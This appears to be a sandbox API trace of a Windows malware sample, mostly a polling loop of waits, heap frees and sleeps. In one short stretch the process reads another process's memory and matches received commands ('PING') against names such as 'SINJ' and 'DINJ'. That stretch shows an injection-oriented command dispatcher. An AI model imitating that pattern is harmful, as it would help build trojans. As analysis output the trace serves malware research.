	[0242.940] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0242.940] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0242.940] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0242.940] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0242.940] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0878) returned 1
	[0242.940] Sleep (dwMilliseconds=0xbb8) 
	[0242.955] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0242.955] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0242.955] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0242.955] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0242.955] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0242.955] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0242.956] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0878) returned 1
	[0242.956] Sleep (dwMilliseconds=0xbb8) 
	[0242.971] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0242.971] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0242.971] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0242.971] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0242.971] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0242.971] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0242.971] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0878) returned 1
	[0242.971] Sleep (dwMilliseconds=0xbb8) 
	[0242.986] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0242.986] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0242.986] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0242.986] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0242.986] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0242.987] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0242.987] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0878) returned 1
	[0242.987] Sleep (dwMilliseconds=0xbb8) 
	[0243.002] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.002] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.002] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.002] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.002] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.002] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.002] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0878) returned 1
	[0243.002] Sleep (dwMilliseconds=0xbb8) 
	[0243.018] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.018] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.018] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.018] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.018] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.018] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.018] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0878) returned 1
	[0243.018] Sleep (dwMilliseconds=0xbb8) 
	[0243.033] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.034] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.034] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.034] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.034] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.034] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.034] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0878) returned 1
	[0243.034] Sleep (dwMilliseconds=0xbb8) 
	[0243.049] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.049] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.049] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.049] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.049] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.049] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.049] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0878) returned 1
	[0243.049] Sleep (dwMilliseconds=0xbb8) 
	[0243.064] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.064] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.064] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.064] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.064] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.064] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.064] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0878) returned 1
	[0243.064] Sleep (dwMilliseconds=0xbb8) 
	[0243.080] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.080] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.080] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.080] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.080] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.080] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.080] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0878) returned 1
	[0243.080] Sleep (dwMilliseconds=0xbb8) 
	[0243.095] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.095] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.095] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.096] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.096] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.096] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.096] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0878) returned 1
	[0243.096] Sleep (dwMilliseconds=0xbb8) 
	[0243.111] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.111] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.111] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.111] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.111] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.111] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.111] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0878) returned 1
	[0243.111] Sleep (dwMilliseconds=0xbb8) 
	[0243.127] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.127] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.127] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.127] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.127] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.127] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.128] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0878) returned 1
	[0243.128] Sleep (dwMilliseconds=0xbb8) 
	[0243.143] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.144] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.144] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.144] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.144] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.144] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.144] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0878) returned 1
	[0243.144] Sleep (dwMilliseconds=0xbb8) 
	[0243.159] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.159] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.159] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.159] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.159] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.159] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.159] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0878) returned 1
	[0243.160] Sleep (dwMilliseconds=0xbb8) 
	[0243.190] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.190] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.190] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.190] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.190] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.190] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.190] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0878) returned 1
	[0243.190] Sleep (dwMilliseconds=0xbb8) 
	[0243.236] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.236] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.236] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.236] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.236] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.236] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.236] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737ea8) returned 1
	[0243.236] Sleep (dwMilliseconds=0xbb8) 
	[0243.253] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.253] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.253] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.253] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.253] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.253] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.253] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737ea8) returned 1
	[0243.253] Sleep (dwMilliseconds=0xbb8) 
	[0243.267] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.267] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.267] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.267] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.267] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.267] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.267] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737ea8) returned 1
	[0243.267] Sleep (dwMilliseconds=0xbb8) 
	[0243.283] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.283] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.283] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.283] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.283] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.283] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.283] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737ea8) returned 1
	[0243.283] Sleep (dwMilliseconds=0xbb8) 
	[0243.298] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.298] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.298] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.298] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.298] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.298] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.298] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737e30) returned 1
	[0243.298] Sleep (dwMilliseconds=0xbb8) 
	[0243.314] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.314] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.314] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.314] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.314] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.314] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.314] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737e30) returned 1
	[0243.314] Sleep (dwMilliseconds=0xbb8) 
	[0243.330] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.330] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.330] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.330] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.330] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.330] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.330] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2737e30) returned 1
	[0243.330] Sleep (dwMilliseconds=0xbb8) 
	[0243.345] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.345] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.345] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.345] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.345] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.345] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.345] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0878) returned 1
	[0243.345] Sleep (dwMilliseconds=0xbb8) 
	[0243.361] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.361] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.361] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.361] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.361] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.361] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.361] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0878) returned 1
	[0243.361] Sleep (dwMilliseconds=0xbb8) 
	[0243.376] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x102
	[0243.376] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x2251f8
	[0243.376] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x26b8780
	[0243.377] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x80) returned 0x225fc8
	[0243.377] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x60034, lpBuffer=0x248fe34, nSize=0x1c, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x248fe34*, lpNumberOfBytesRead=0x248fe0c*=0x1c) returned 1
	[0243.377] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0x10064c1c, lpBuffer=0x2251f8, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x2251f8*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0243.377] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2251f8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 5
	[0243.377] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffdf8
	[0243.377] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2251f8, cbMultiByte=-1, lpWideCharStr=0x22ffdf8, cchWideChar=5 | out: lpWideCharStr="PING") returned 5
	[0243.377] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe60, lpBuffer=0x26b8780, nSize=0x3ff, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x26b8780, lpNumberOfBytesRead=0x248fe0c) returned 0
	[0243.377] ReadProcessMemory (in: hProcess=0x47c, lpBaseAddress=0xf8fe38, lpBuffer=0x225fc8, nSize=0x7f, lpNumberOfBytesRead=0x248fe0c | out: lpBuffer=0x225fc8*, lpNumberOfBytesRead=0x248fe0c*=0x7f) returned 1
	[0243.377] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225fc8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8
	[0243.377] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c07b0
	[0243.377] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x225fc8, cbMultiByte=-1, lpWideCharStr=0x27c07b0, cchWideChar=8 | out: lpWideCharStr="browser") returned 8
	[0243.377] SetEvent (hEvent=0x474) returned 1
	[0243.377] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2251f8) returned 1
	[0243.377] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x26b8780) returned 1
	[0243.377] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x225fc8) returned 1
	[0243.377] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0828
	[0243.377] lstrcmpiW (lpString1="PING", lpString2="ModuleQuery") returned 1
	[0243.377] lstrcmpiW (lpString1="PING", lpString2="WantRelease") returned -1
	[0243.377] lstrcmpiW (lpString1="PING", lpString2="VERS") returned -1
	[0243.377] lstrcmpiW (lpString1="PING", lpString2="SINJ") returned -1
	[0243.377] lstrcmpiW (lpString1="PING", lpString2="DINJ") returned 1
	[0243.377] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x22ffdb0
	[0243.377] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xd730f0, lpParameter=0x27c0878, dwCreationFlags=0x0, lpThreadId=0x248ff58 | out: lpThreadId=0x248ff58*=0xde0) returned 0x61c
	[0243.378] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x27c0850
	[0243.378] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.378] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.378] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.378] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.378] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.378] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0850) returned 1
	[0243.378] Sleep (dwMilliseconds=0xbb8) 
	[0243.392] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.392] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.392] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.392] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.392] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.392] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.392] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0850) returned 1
	[0243.392] Sleep (dwMilliseconds=0xbb8) 
	[0243.408] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.408] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.408] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.408] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.408] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.408] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.408] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0530) returned 1
	[0243.408] Sleep (dwMilliseconds=0xbb8) 
	[0243.423] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.423] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.423] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.423] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.423] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.424] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.424] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0530) returned 1
	[0243.424] Sleep (dwMilliseconds=0xbb8) 
	[0243.439] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.439] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.440] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.440] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.440] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.440] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.440] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0530) returned 1
	[0243.440] Sleep (dwMilliseconds=0xbb8) 
	[0243.455] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.455] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.455] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.455] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.455] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.455] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.456] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0530) returned 1
	[0243.456] Sleep (dwMilliseconds=0xbb8) 
	[0243.472] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.473] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.473] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.473] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.473] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.473] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.473] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0530) returned 1
	[0243.473] Sleep (dwMilliseconds=0xbb8) 
	[0243.486] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.486] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.486] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.486] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.486] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.486] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.487] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0530) returned 1
	[0243.487] Sleep (dwMilliseconds=0xbb8) 
	[0243.503] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.503] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.503] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.503] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.503] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.503] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.503] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0530) returned 1
	[0243.503] Sleep (dwMilliseconds=0xbb8) 
	[0243.517] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.517] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.517] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.517] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
	[0243.517] WaitForSingleObject (hHandle=0x540, dwMilliseconds=0x0) returned 0x0
	[0243.517] WaitForSingleObject (hHandle=0x5a4, dwMilliseconds=0x0) returned 0x0
	[0243.517] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27c0530) returned 1
	[0243.517] Sleep (dwMilliseconds=0xbb8) 
	[0243.532] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0243.532] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0243.532] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0243.532] WaitForSingleObject (hHandle=0x55c, dwMilliseconds=0x0) returned 0x0
